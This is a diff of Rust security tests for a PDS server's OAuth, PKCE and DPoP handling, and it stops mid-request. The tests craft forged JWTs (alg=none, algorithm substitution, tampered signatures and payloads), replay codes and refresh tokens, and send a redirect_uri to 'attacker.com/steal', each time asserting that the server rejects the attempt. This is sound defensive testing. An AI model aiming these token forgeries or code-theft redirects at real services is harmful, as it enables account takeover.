.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
124
-
("code_challenge", "plain-text-challenge"), ("code_challenge_method", "plain")])
125
-
.send().await.unwrap();
126
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "PKCE plain method should be rejected");
127
let body: Value = res.json().await.unwrap();
128
-
assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("s256"));
129
-
let res = http_client.post(format!("{}/oauth/par", url))
130
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri)])
131
-
.send().await.unwrap();
132
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected");
133
let ts = Utc::now().timestamp_millis();
134
let handle = format!("pkce-attack-{}", ts);
135
let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
···
139
verify_new_account(&http_client, account["did"].as_str().unwrap()).await;
140
let (_, code_challenge) = generate_pkce();
141
let (attacker_verifier, _) = generate_pkce();
142
-
let par_body: Value = http_client.post(format!("{}/oauth/par", url))
143
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
144
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
145
-
.send().await.unwrap().json().await.unwrap();
146
let request_uri = par_body["request_uri"].as_str().unwrap();
147
-
let auth_client = no_redirect_client();
148
-
let auth_res = auth_client.post(format!("{}/oauth/authorize", url))
149
-
.form(&[("request_uri", request_uri), ("username", &handle), ("password", "pkce-password"), ("remember_device", "false")])
150
-
.send().await.unwrap();
151
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
152
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
153
-
let token_res = http_client.post(format!("{}/oauth/token", url))
154
-
.form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri),
155
-
("code_verifier", &attacker_verifier), ("client_id", &client_id)])
156
.send().await.unwrap();
157
-
assert_eq!(token_res.status(), StatusCode::BAD_REQUEST, "Wrong PKCE verifier should be rejected");
158
}
159
160
#[tokio::test]
···
172
let mock_client = setup_mock_client_metadata(redirect_uri).await;
173
let client_id = mock_client.uri();
174
let (code_verifier, code_challenge) = generate_pkce();
175
-
let par_body: Value = http_client.post(format!("{}/oauth/par", url))
176
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
177
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
178
-
.send().await.unwrap().json().await.unwrap();
179
let request_uri = par_body["request_uri"].as_str().unwrap();
180
-
let auth_client = no_redirect_client();
181
-
let auth_res = auth_client.post(format!("{}/oauth/authorize", url))
182
-
.form(&[("request_uri", request_uri), ("username", &handle), ("password", "replay-password"), ("remember_device", "false")])
183
.send().await.unwrap();
184
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
185
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap().to_string();
186
-
let first = http_client.post(format!("{}/oauth/token", url))
187
-
.form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri),
188
-
("code_verifier", &code_verifier), ("client_id", &client_id)])
189
-
.send().await.unwrap();
190
assert_eq!(first.status(), StatusCode::OK, "First use should succeed");
191
let first_body: Value = first.json().await.unwrap();
192
-
let replay = http_client.post(format!("{}/oauth/token", url))
193
-
.form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri),
194
-
("code_verifier", &code_verifier), ("client_id", &client_id)])
195
-
.send().await.unwrap();
196
-
assert_eq!(replay.status(), StatusCode::BAD_REQUEST, "Auth code replay should fail");
197
let stolen_rt = first_body["refresh_token"].as_str().unwrap().to_string();
198
-
let first_refresh: Value = http_client.post(format!("{}/oauth/token", url))
199
-
.form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)])
200
-
.send().await.unwrap().json().await.unwrap();
201
-
assert!(first_refresh["access_token"].is_string(), "First refresh should succeed");
202
let new_rt = first_refresh["refresh_token"].as_str().unwrap();
203
-
let rt_replay = http_client.post(format!("{}/oauth/token", url))
204
-
.form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)])
205
-
.send().await.unwrap();
206
-
assert_eq!(rt_replay.status(), StatusCode::BAD_REQUEST, "Refresh token replay should fail");
207
let body: Value = rt_replay.json().await.unwrap();
208
-
assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("reuse"));
209
-
let family_revoked = http_client.post(format!("{}/oauth/token", url))
210
-
.form(&[("grant_type", "refresh_token"), ("refresh_token", new_rt), ("client_id", &client_id)])
211
-
.send().await.unwrap();
212
-
assert_eq!(family_revoked.status(), StatusCode::BAD_REQUEST, "Token family should be revoked");
213
}
214
215
#[tokio::test]
···
220
let mock_client = setup_mock_client_metadata(registered_redirect).await;
221
let client_id = mock_client.uri();
222
let (_, code_challenge) = generate_pkce();
223
-
let res = http_client.post(format!("{}/oauth/par", url))
224
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", "https://attacker.com/steal"),
225
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
226
-
.send().await.unwrap();
227
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected");
228
let ts = Utc::now().timestamp_millis();
229
let handle = format!("deact-{}", ts);
230
let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
···
232
.send().await.unwrap();
233
let account: Value = create_res.json().await.unwrap();
234
let access_jwt = verify_new_account(&http_client, account["did"].as_str().unwrap()).await;
235
-
http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url))
236
-
.bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap();
237
-
let deact_par: Value = http_client.post(format!("{}/oauth/par", url))
238
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", registered_redirect),
239
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
240
-
.send().await.unwrap().json().await.unwrap();
241
let auth_res = http_client.post(format!("{}/oauth/authorize", url))
242
.header("Accept", "application/json")
243
-
.form(&[("request_uri", deact_par["request_uri"].as_str().unwrap()), ("username", &handle), ("password", "deact-password"), ("remember_device", "false")])
244
.send().await.unwrap();
245
-
assert_eq!(auth_res.status(), StatusCode::FORBIDDEN, "Deactivated account should be blocked");
246
let redirect_uri_a = "https://app-a.com/callback";
247
let mock_a = setup_mock_client_metadata(redirect_uri_a).await;
248
let client_id_a = mock_a.uri();
···
256
let account2: Value = create_res2.json().await.unwrap();
257
verify_new_account(&http_client, account2["did"].as_str().unwrap()).await;
258
let (code_verifier2, code_challenge2) = generate_pkce();
259
-
let par_a: Value = http_client.post(format!("{}/oauth/par", url))
260
-
.form(&[("response_type", "code"), ("client_id", &client_id_a), ("redirect_uri", redirect_uri_a),
261
-
("code_challenge", &code_challenge2), ("code_challenge_method", "S256")])
262
-
.send().await.unwrap().json().await.unwrap();
263
-
let auth_client = no_redirect_client();
264
-
let auth_a = auth_client.post(format!("{}/oauth/authorize", url))
265
-
.form(&[("request_uri", par_a["request_uri"].as_str().unwrap()), ("username", &handle2), ("password", "cross-password"), ("remember_device", "false")])
266
.send().await.unwrap();
267
-
let loc_a = auth_a.headers().get("location").unwrap().to_str().unwrap();
268
-
let code_a = loc_a.split("code=").nth(1).unwrap().split('&').next().unwrap();
269
-
let cross_client = http_client.post(format!("{}/oauth/token", url))
270
-
.form(&[("grant_type", "authorization_code"), ("code", code_a), ("redirect_uri", redirect_uri_a),
271
-
("code_verifier", &code_verifier2), ("client_id", &client_id_b)])
272
-
.send().await.unwrap();
273
-
assert_eq!(cross_client.status(), StatusCode::BAD_REQUEST, "Cross-client code exchange must be rejected");
274
}
275
276
#[tokio::test]
277
async fn test_malformed_tokens_and_headers() {
278
let url = base_url().await;
279
let http_client = client();
280
-
let malformed = vec!["", "not-a-token", "one.two", "one.two.three.four", "....", "eyJhbGciOiJIUzI1NiJ9",
281
-
"eyJhbGciOiJIUzI1NiJ9.", "eyJhbGciOiJIUzI1NiJ9..", ".eyJzdWIiOiJ0ZXN0In0.", "!!invalid!!.eyJ9.sig"];
282
for token in &malformed {
283
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
284
-
.bearer_auth(token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED);
285
}
286
let wrong_types = vec!["JWT", "jwt", "at+JWT", ""];
287
for typ in wrong_types {
288
let header = json!({ "alg": "HS256", "typ": typ });
289
let payload = json!({ "iss": "x", "sub": "did:plc:x", "aud": "x", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "x" });
290
-
let token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()),
291
-
URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32]));
292
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
293
-
.bearer_auth(&token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "typ='{}' should be rejected", typ);
294
}
295
let (access_token, _, _) = get_oauth_tokens(&http_client, url).await;
296
-
let invalid_formats = vec![format!("Basic {}", access_token), format!("Digest {}", access_token),
297
-
access_token.clone(), format!("Bearer{}", access_token)];
298
for auth in &invalid_formats {
299
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
300
-
.header("Authorization", auth).send().await.unwrap().status(), StatusCode::UNAUTHORIZED);
301
}
302
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
303
-
.send().await.unwrap().status(), StatusCode::UNAUTHORIZED);
304
-
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
305
-
.header("Authorization", "").send().await.unwrap().status(), StatusCode::UNAUTHORIZED);
306
-
let grants = vec!["client_credentials", "password", "implicit", "", "AUTHORIZATION_CODE"];
307
for grant in grants {
308
-
assert_eq!(http_client.post(format!("{}/oauth/token", url))
309
-
.form(&[("grant_type", grant), ("client_id", "https://example.com")])
310
-
.send().await.unwrap().status(), StatusCode::BAD_REQUEST, "Grant '{}' should be rejected", grant);
311
}
312
}
313
···
316
let url = base_url().await;
317
let http_client = client();
318
let (access_token, refresh_token, _) = get_oauth_tokens(&http_client, url).await;
319
-
assert_eq!(http_client.post(format!("{}/oauth/revoke", url))
320
-
.form(&[("token", &refresh_token)]).send().await.unwrap().status(), StatusCode::OK);
321
-
let introspect: Value = http_client.post(format!("{}/oauth/introspect", url))
322
-
.form(&[("token", &access_token)]).send().await.unwrap().json().await.unwrap();
323
-
assert_eq!(introspect["active"], false, "Revoked token should be inactive");
324
}
325
326
-
fn create_dpop_proof(method: &str, uri: &str, _nonce: Option<&str>, ath: Option<&str>, iat_offset: i64) -> String {
327
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
328
use p256::elliptic_curve::sec1::ToEncodedPoint;
329
let signing_key = SigningKey::random(&mut rand::thread_rng());
···
333
let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } });
334
let mut payload = json!({ "jti": format!("unique-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)),
335
"htm": method, "htu": uri, "iat": Utc::now().timestamp() + iat_offset });
336
-
if let Some(a) = ath { payload["ath"] = json!(a); }
337
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
338
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
339
let signing_input = format!("{}.{}", header_b64, payload_b64);
340
let signature: Signature = signing_key.sign(signing_input.as_bytes());
341
-
format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes()))
342
}
343
344
#[test]
···
350
let nonce = v1.generate_nonce();
351
assert!(!nonce.is_empty());
352
assert!(v1.validate_nonce(&nonce).is_ok(), "Valid nonce should pass");
353
-
assert!(v2.validate_nonce(&nonce).is_err(), "Nonce from different secret should fail");
354
let nonce_bytes = URL_SAFE_NO_PAD.decode(&nonce).unwrap();
355
let mut tampered = nonce_bytes.clone();
356
-
if !tampered.is_empty() { tampered[0] ^= 0xFF; }
357
-
assert!(v1.validate_nonce(&URL_SAFE_NO_PAD.encode(&tampered)).is_err(), "Tampered nonce should fail");
358
assert!(v1.validate_nonce("invalid").is_err());
359
assert!(v1.validate_nonce("").is_err());
360
assert!(v1.validate_nonce("!!!not-base64!!!").is_err());
···
364
fn test_dpop_proof_validation() {
365
let secret = b"test-dpop-secret-32-bytes-long!!";
366
let verifier = DPoPVerifier::new(secret);
367
-
assert!(verifier.verify_proof("not.enough", "POST", "https://example.com", None).is_err());
368
-
assert!(verifier.verify_proof("invalid", "POST", "https://example.com", None).is_err());
369
let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0);
370
-
assert!(verifier.verify_proof(&proof, "GET", "https://example.com/token", None).is_err(), "Method mismatch");
371
-
assert!(verifier.verify_proof(&proof, "POST", "https://other.com/token", None).is_err(), "URI mismatch");
372
-
assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None).is_ok(), "Query params should be ignored");
373
let old_proof = create_dpop_proof("POST", "https://example.com/token", None, None, -600);
374
-
assert!(verifier.verify_proof(&old_proof, "POST", "https://example.com/token", None).is_err(), "iat too old");
375
let future_proof = create_dpop_proof("POST", "https://example.com/token", None, None, 600);
376
-
assert!(verifier.verify_proof(&future_proof, "POST", "https://example.com/token", None).is_err(), "iat in future");
377
-
let ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, Some("wrong"), 0);
378
-
assert!(verifier.verify_proof(&ath_proof, "GET", "https://example.com/resource", Some("correct")).is_err(), "ath mismatch");
379
let no_ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, None, 0);
380
-
assert!(verifier.verify_proof(&no_ath_proof, "GET", "https://example.com/resource", Some("expected")).is_err(), "Missing ath");
381
}
382
383
#[test]
···
398
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
399
let signing_input = format!("{}.{}", header_b64, payload_b64);
400
let signature: Signature = signing_key.sign(signing_input.as_bytes());
401
-
let mismatched = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes()));
402
-
assert!(verifier.verify_proof(&mismatched, "POST", "https://example.com/token", None).is_err(), "Mismatched key should fail");
403
let point = signing_key.verifying_key().to_encoded_point(false);
404
let good_header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256",
405
"x": URL_SAFE_NO_PAD.encode(point.x().unwrap()), "y": URL_SAFE_NO_PAD.encode(point.y().unwrap()) } });
···
409
let mut sig_bytes = good_sig.to_bytes().to_vec();
410
sig_bytes[0] ^= 0xFF;
411
let tampered = format!("{}.{}", good_input, URL_SAFE_NO_PAD.encode(&sig_bytes));
412
-
assert!(verifier.verify_proof(&tampered, "POST", "https://example.com/token", None).is_err(), "Tampered sig should fail");
413
}
414
415
#[test]
416
fn test_jwk_thumbprint() {
417
-
let jwk = DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()),
418
x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()),
419
-
y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()) };
420
let tp1 = compute_jwk_thumbprint(&jwk).unwrap();
421
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
422
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
423
assert!(!tp1.is_empty());
424
-
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("secp256k1".to_string()),
425
-
x: Some("x".to_string()), y: Some("y".to_string()) }).is_ok());
426
-
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "OKP".to_string(), crv: Some("Ed25519".to_string()),
427
-
x: Some("x".to_string()), y: None }).is_ok());
428
-
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: None, x: Some("x".to_string()), y: Some("y".to_string()) }).is_err());
429
-
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: None, y: Some("y".to_string()) }).is_err());
430
-
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: Some("x".to_string()), y: None }).is_err());
431
-
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "RSA".to_string(), crv: None, x: None, y: None }).is_err());
432
}
433
434
#[test]
···
437
use p256::elliptic_curve::sec1::ToEncodedPoint;
438
let secret = b"test-dpop-secret-32-bytes-long!!";
439
let verifier = DPoPVerifier::new(secret);
440
-
let test_cases = vec![(-600, true), (-301, true), (-299, false), (0, false), (299, false), (301, true), (600, true)];
441
for (offset, should_fail) in test_cases {
442
let signing_key = SigningKey::random(&mut rand::thread_rng());
443
let point = signing_key.verifying_key().to_encoded_point(false);
···
450
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
451
let signing_input = format!("{}.{}", header_b64, payload_b64);
452
let signature: Signature = signing_key.sign(signing_input.as_bytes());
453
-
let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes()));
454
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
455
-
if should_fail { assert!(result.is_err(), "offset {} should fail", offset); }
456
-
else { assert!(result.is_ok(), "offset {} should pass", offset); }
457
}
458
}
459
···
474
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
475
let signing_input = format!("{}.{}", header_b64, payload_b64);
476
let signature: Signature = signing_key.sign(signing_input.as_bytes());
477
-
let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes()));
478
-
assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token", None).is_ok(), "HTTP method should be case-insensitive");
479
}
···
2
mod common;
3
mod helpers;
4
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
5
use chrono::Utc;
6
use common::{base_url, client};
7
use helpers::verify_new_account;
8
+
use reqwest::StatusCode;
9
use serde_json::{Value, json};
10
use sha2::{Digest, Sha256};
11
+
use tranquil_pds::oauth::dpop::{DPoPJwk, DPoPVerifier, compute_jwk_thumbprint};
12
use wiremock::matchers::{method, path};
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
15
fn generate_pkce() -> (String, String) {
16
let verifier_bytes: [u8; 32] = rand::random();
···
32
"token_endpoint_auth_method": "none",
33
"dpop_bound_access_tokens": false
34
});
35
+
Mock::given(method("GET"))
36
+
.and(path("/"))
37
.respond_with(ResponseTemplate::new(200).set_body_json(metadata))
38
+
.mount(&mock_server)
39
+
.await;
40
mock_server
41
}
42
···
53
let mock_client = setup_mock_client_metadata(redirect_uri).await;
54
let client_id = mock_client.uri();
55
let (code_verifier, code_challenge) = generate_pkce();
56
+
let par_body: Value = http_client
57
+
.post(format!("{}/oauth/par", url))
58
+
.form(&[
59
+
("response_type", "code"),
60
+
("client_id", &client_id),
61
+
("redirect_uri", redirect_uri),
62
+
("code_challenge", &code_challenge),
63
+
("code_challenge_method", "S256"),
64
+
])
65
+
.send()
66
+
.await
67
+
.unwrap()
68
+
.json()
69
+
.await
70
+
.unwrap();
71
let request_uri = par_body["request_uri"].as_str().unwrap();
72
+
let auth_res = http_client.post(format!("{}/oauth/authorize", url))
73
+
.header("Content-Type", "application/json")
74
+
.header("Accept", "application/json")
75
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": "security-test-password", "remember_device": false}))
76
.send().await.unwrap();
77
+
let auth_body: Value = auth_res.json().await.unwrap();
78
+
let mut location = auth_body["redirect_uri"].as_str().unwrap().to_string();
79
+
if location.contains("/oauth/consent") {
80
+
let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url))
81
+
.header("Content-Type", "application/json")
82
+
.json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false}))
83
+
.send().await.unwrap();
84
+
let consent_body: Value = consent_res.json().await.unwrap();
85
+
location = consent_body["redirect_uri"].as_str().unwrap().to_string();
86
+
}
87
+
let code = location
88
+
.split("code=")
89
+
.nth(1)
90
+
.unwrap()
91
+
.split('&')
92
+
.next()
93
+
.unwrap();
94
+
let token_body: Value = http_client
95
+
.post(format!("{}/oauth/token", url))
96
+
.form(&[
97
+
("grant_type", "authorization_code"),
98
+
("code", code),
99
+
("redirect_uri", redirect_uri),
100
+
("code_verifier", &code_verifier),
101
+
("client_id", &client_id),
102
+
])
103
+
.send()
104
+
.await
105
+
.unwrap()
106
+
.json()
107
+
.await
108
+
.unwrap();
109
+
(
110
+
token_body["access_token"].as_str().unwrap().to_string(),
111
+
token_body["refresh_token"].as_str().unwrap().to_string(),
112
+
client_id,
113
+
)
114
}
115
116
#[tokio::test]
···
122
assert_eq!(parts.len(), 3);
123
let forged_sig = URL_SAFE_NO_PAD.encode(&[0u8; 32]);
124
let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_sig);
125
+
assert_eq!(
126
+
http_client
127
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
128
+
.bearer_auth(&forged_token)
129
+
.send()
130
+
.await
131
+
.unwrap()
132
+
.status(),
133
+
StatusCode::UNAUTHORIZED,
134
+
"Forged signature should be rejected"
135
+
);
136
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
137
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
138
payload["sub"] = json!("did:plc:attacker");
139
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
140
let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
141
+
assert_eq!(
142
+
http_client
143
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
144
+
.bearer_auth(&modified_token)
145
+
.send()
146
+
.await
147
+
.unwrap()
148
+
.status(),
149
+
StatusCode::UNAUTHORIZED,
150
+
"Modified payload should be rejected"
151
+
);
152
let none_header = json!({ "alg": "none", "typ": "at+jwt" });
153
let none_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:attacker", "aud": "https://test.pds",
154
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "fake", "scope": "atproto" });
155
+
let none_token = format!(
156
+
"{}.{}.",
157
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_header).unwrap()),
158
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap())
159
+
);
160
+
assert_eq!(
161
+
http_client
162
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
163
+
.bearer_auth(&none_token)
164
+
.send()
165
+
.await
166
+
.unwrap()
167
+
.status(),
168
+
StatusCode::UNAUTHORIZED,
169
+
"alg=none should be rejected"
170
+
);
171
let rs256_header = json!({ "alg": "RS256", "typ": "at+jwt" });
172
+
let rs256_token = format!(
173
+
"{}.{}.{}",
174
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&rs256_header).unwrap()),
175
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()),
176
+
URL_SAFE_NO_PAD.encode(&[1u8; 64])
177
+
);
178
+
assert_eq!(
179
+
http_client
180
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
181
+
.bearer_auth(&rs256_token)
182
+
.send()
183
+
.await
184
+
.unwrap()
185
+
.status(),
186
+
StatusCode::UNAUTHORIZED,
187
+
"Algorithm substitution should be rejected"
188
+
);
189
let expired_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:test", "aud": "https://test.pds",
190
"iat": Utc::now().timestamp() - 7200, "exp": Utc::now().timestamp() - 3600, "jti": "expired" });
191
+
let expired_token = format!(
192
+
"{}.{}.{}",
193
+
URL_SAFE_NO_PAD
194
+
.encode(serde_json::to_string(&json!({"alg":"HS256","typ":"at+jwt"})).unwrap()),
195
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&expired_payload).unwrap()),
196
+
URL_SAFE_NO_PAD.encode(&[1u8; 32])
197
+
);
198
+
assert_eq!(
199
+
http_client
200
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
201
+
.bearer_auth(&expired_token)
202
+
.send()
203
+
.await
204
+
.unwrap()
205
+
.status(),
206
+
StatusCode::UNAUTHORIZED,
207
+
"Expired token should be rejected"
208
+
);
209
}
210
211
#[tokio::test]
···
215
let redirect_uri = "https://example.com/pkce-callback";
216
let mock_client = setup_mock_client_metadata(redirect_uri).await;
217
let client_id = mock_client.uri();
218
+
let res = http_client
219
+
.post(format!("{}/oauth/par", url))
220
+
.form(&[
221
+
("response_type", "code"),
222
+
("client_id", &client_id),
223
+
("redirect_uri", redirect_uri),
224
+
("code_challenge", "plain-text-challenge"),
225
+
("code_challenge_method", "plain"),
226
+
])
227
+
.send()
228
+
.await
229
+
.unwrap();
230
+
assert_eq!(
231
+
res.status(),
232
+
StatusCode::BAD_REQUEST,
233
+
"PKCE plain method should be rejected"
234
+
);
235
let body: Value = res.json().await.unwrap();
236
+
assert!(
237
+
body["error_description"]
238
+
.as_str()
239
+
.unwrap()
240
+
.to_lowercase()
241
+
.contains("s256")
242
+
);
243
+
let res = http_client
244
+
.post(format!("{}/oauth/par", url))
245
+
.form(&[
246
+
("response_type", "code"),
247
+
("client_id", &client_id),
248
+
("redirect_uri", redirect_uri),
249
+
])
250
+
.send()
251
+
.await
252
+
.unwrap();
253
+
assert_eq!(
254
+
res.status(),
255
+
StatusCode::BAD_REQUEST,
256
+
"Missing PKCE challenge should be rejected"
257
+
);
258
let ts = Utc::now().timestamp_millis();
259
let handle = format!("pkce-attack-{}", ts);
260
let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
···
264
verify_new_account(&http_client, account["did"].as_str().unwrap()).await;
265
let (_, code_challenge) = generate_pkce();
266
let (attacker_verifier, _) = generate_pkce();
267
+
let par_body: Value = http_client
268
+
.post(format!("{}/oauth/par", url))
269
+
.form(&[
270
+
("response_type", "code"),
271
+
("client_id", &client_id),
272
+
("redirect_uri", redirect_uri),
273
+
("code_challenge", &code_challenge),
274
+
("code_challenge_method", "S256"),
275
+
])
276
+
.send()
277
+
.await
278
+
.unwrap()
279
+
.json()
280
+
.await
281
+
.unwrap();
282
let request_uri = par_body["request_uri"].as_str().unwrap();
283
+
let auth_res = http_client.post(format!("{}/oauth/authorize", url))
284
+
.header("Content-Type", "application/json")
285
+
.header("Accept", "application/json")
286
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": "pkce-password", "remember_device": false}))
287
.send().await.unwrap();
288
+
assert_eq!(auth_res.status(), StatusCode::OK);
289
+
let auth_body: Value = auth_res.json().await.unwrap();
290
+
let mut location = auth_body["redirect_uri"].as_str().unwrap().to_string();
291
+
if location.contains("/oauth/consent") {
292
+
let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url))
293
+
.header("Content-Type", "application/json")
294
+
.json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false}))
295
+
.send().await.unwrap();
296
+
let consent_body: Value = consent_res.json().await.unwrap();
297
+
location = consent_body["redirect_uri"].as_str().unwrap().to_string();
298
+
}
299
+
let code = location
300
+
.split("code=")
301
+
.nth(1)
302
+
.unwrap()
303
+
.split('&')
304
+
.next()
305
+
.unwrap();
306
+
let token_res = http_client
307
+
.post(format!("{}/oauth/token", url))
308
+
.form(&[
309
+
("grant_type", "authorization_code"),
310
+
("code", code),
311
+
("redirect_uri", redirect_uri),
312
+
("code_verifier", &attacker_verifier),
313
+
("client_id", &client_id),
314
+
])
315
+
.send()
316
+
.await
317
+
.unwrap();
318
+
assert_eq!(
319
+
token_res.status(),
320
+
StatusCode::BAD_REQUEST,
321
+
"Wrong PKCE verifier should be rejected"
322
+
);
323
}
324
325
#[tokio::test]
···
337
let mock_client = setup_mock_client_metadata(redirect_uri).await;
338
let client_id = mock_client.uri();
339
let (code_verifier, code_challenge) = generate_pkce();
340
+
let par_body: Value = http_client
341
+
.post(format!("{}/oauth/par", url))
342
+
.form(&[
343
+
("response_type", "code"),
344
+
("client_id", &client_id),
345
+
("redirect_uri", redirect_uri),
346
+
("code_challenge", &code_challenge),
347
+
("code_challenge_method", "S256"),
348
+
])
349
+
.send()
350
+
.await
351
+
.unwrap()
352
+
.json()
353
+
.await
354
+
.unwrap();
355
let request_uri = par_body["request_uri"].as_str().unwrap();
356
+
let auth_res = http_client.post(format!("{}/oauth/authorize", url))
357
+
.header("Content-Type", "application/json")
358
+
.header("Accept", "application/json")
359
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": "replay-password", "remember_device": false}))
360
.send().await.unwrap();
361
+
assert_eq!(auth_res.status(), StatusCode::OK);
362
+
let auth_body: Value = auth_res.json().await.unwrap();
363
+
let mut location = auth_body["redirect_uri"].as_str().unwrap().to_string();
364
+
if location.contains("/oauth/consent") {
365
+
let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url))
366
+
.header("Content-Type", "application/json")
367
+
.json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false}))
368
+
.send().await.unwrap();
369
+
let consent_body: Value = consent_res.json().await.unwrap();
370
+
location = consent_body["redirect_uri"].as_str().unwrap().to_string();
371
+
}
372
+
let code = location
373
+
.split("code=")
374
+
.nth(1)
375
+
.unwrap()
376
+
.split('&')
377
+
.next()
378
+
.unwrap()
379
+
.to_string();
380
+
let first = http_client
381
+
.post(format!("{}/oauth/token", url))
382
+
.form(&[
383
+
("grant_type", "authorization_code"),
384
+
("code", &code),
385
+
("redirect_uri", redirect_uri),
386
+
("code_verifier", &code_verifier),
387
+
